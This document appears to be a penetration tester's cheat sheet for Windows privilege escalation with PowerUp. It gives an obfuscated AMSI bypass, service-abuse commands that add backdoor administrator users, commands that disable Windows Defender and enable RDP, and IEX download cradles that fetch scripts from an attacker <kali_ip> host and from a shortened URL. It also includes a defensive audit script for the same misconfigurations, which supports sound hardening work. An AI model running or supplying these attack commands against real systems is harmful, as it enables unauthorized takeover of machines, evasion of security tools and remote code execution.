PowerUp Exploits
Import PowerUp
powershell -ep bypass
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Import-Module PowerUp.ps1
Invoke-AllChecks | Out-File -Encoding ASCII checks.txt

ServiceName: This is the name of the service
Path: This is where the program is located or run from
ModifiableFile: If we can abuse this service, this is the file that will be modified
StartName: This is the account the service runs as. It is important that this user has higher privileges than our current privileges, otherwise exploiting the service is pointless. Generally we want it running as LocalSystem or with Administrator privileges.
CanRestart: It is important that this is True. We must be able to restart the service, otherwise the changes can’t take effect and our privileges won’t be escalated. If you have access to restart the machine that’s an option, but we generally want to avoid restarting machines if possible.
AbuseFunction: If we type in this command as-is, PowerUp.ps1 will exploit the service automatically and add a user named john with a password of Password123! to the administrator’s group. (This can be changed of course but this is the default configuration.)
Vulnerable Service Executable
This misconfiguration happens when the executable associated with a service has improper permissions, allowing other users to write to the .exe. Since these services run as SYSTEM, if we replace the exe with our own, we can escalate quickly. PowerUp includes a function to easily back up the service .exe and write out a patched C# service binary to that location. It returns True on success and False on failure. We can use the -Verbose flag to get some more information:
Write-ServiceEXE -ServiceName <servicename> -UserName backdoor -Password password123 -Verbose
This new service binary will create a new user named backdoor, and add them to the local administrators. If we can’t start/stop the service, rebooting the box should do the trick to get the user added.
#Running the below command should place the original binary back in its proper place
Restore-ServiceEXE -ServiceName CustomSVC
Sometimes the service itself is vulnerable: if we can modify the service configuration and start/stop it, we can change its binary path to something like “net user backdoor2 /add”. If we start/stop the service and then repeat the process to add the user to the local administrators, we’re golden:
Invoke-ServiceUserAdd -ServiceName <ServiceName> -UserName backdoor2 -Password password123 -Verbose
AlwaysInstallElevated key
Let’s check out the AlwaysInstallElevated key. This is a key sometimes set by enterprises in an attempt to simplify the deployment of installer packages without granting users administrative rights. However, setting this key is effectively the same as giving users those rights, since writing out a custom .msi installer and running it gives the user elevated privileges:
Write-UserAddMSI
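As an added example (not PowerUp's own code), a defender-side audit for the two conditions the sections above rely on: service binaries that broad groups can overwrite (what Write-ServiceEXE needs) and the AlwaysInstallElevated policy, which only takes effect when both the machine and user values are set. It assumes an elevated PowerShell session on the host being reviewed; the function names and the principal list are my own choices.

```powershell
# Added audit script, not part of PowerUp: finds the two misconfigurations the
# notes above abuse so they can be fixed before anyone reaches them.
# Run from an elevated PowerShell on the host being reviewed.

# Principals that should never be able to replace a service binary.
$BroadPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                     'NT AUTHORITY\INTERACTIVE')

function Get-ServiceBinaryPath([string]$PathName) {
    # Win32_Service.PathName may be quoted, unquoted, and carry arguments.
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^\s*(.+?\.exe)') { return $Matches[1] }
    return $null
}

function Test-ReplaceRights([int]$Rights) {
    # Rights that let a user overwrite, delete, or re-ACL the file.
    $mask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
    $generic = 0x10000000 -bor 0x40000000   # GENERIC_ALL | GENERIC_WRITE on unmapped ACEs
    return (($Rights -band $mask) -ne 0) -or (($Rights -band $generic) -ne 0)
}

function Find-WritableServiceBinaries {
    foreach ($svc in Get-CimInstance Win32_Service) {
        $exe = Get-ServiceBinaryPath $svc.PathName
        if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { continue }
        foreach ($ace in (Get-Acl -LiteralPath $exe).Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            if (Test-ReplaceRights ([int]$ace.FileSystemRights)) {
                [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; Path = $exe
                                   Principal = $ace.IdentityReference.Value; Rights = $ace.FileSystemRights }
            }
        }
    }
}

function Test-AlwaysInstallElevated {
    # The policy only takes effect when BOTH the machine and user values are 1.
    $result = [ordered]@{}
    foreach ($hive in 'HKLM', 'HKCU') {
        $key = "$($hive):\SOFTWARE\Policies\Microsoft\Windows\Installer"
        $val = (Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        $result[$hive] = ($val -eq 1)
    }
    $result['Effective'] = $result['HKLM'] -and $result['HKCU']
    [pscustomobject]$result
}

Find-WritableServiceBinaries | Format-Table -AutoSize
Test-AlwaysInstallElevated
```

Any row from the first function means the listed principal can swap the binary of a service running as RunsAs; remove that ACE (or move the binary under Program Files with default ACLs). An Effective value of True means the policy should be cleared in both hives.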
Customizing the Exploit
Adding a new user and password with the -User and -Password options
Invoke-ServiceAbuse -Name 'AbyssWebServer' -User hacker -Password Password1337
Running a custom command (Disable Windows Defender)
Invoke-ServiceAbuse -Name 'AbyssWebServer' -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
Running a custom command (Enable RDP services)
Invoke-ServiceAbuse -Name 'AbyssWebServer' -Command 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
Running PowerUp.ps1 Without Touching Disk
Load Directly From Github
PS C:\> IEX (New-Object Net.WebClient).DownloadString("http://bit.ly/1PdjSHk")
Loading From Your Kali Apache Server
PS C:\> IEX (New-Object Net.WebClient).DownloadString('http://<kali_ip>/PowerUp.ps1')
PowerShell Version 3 And Above
PS C:\> iex (iwr 'http://<kali_ip>/PowerUp.ps1')
Alternative Method
PS C:\> $wr = [System.NET.WebRequest]::Create("http://<kali_ip>/PowerUp.ps1")
PS C:\> $r = $wr.GetResponse()
PS C:\> IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()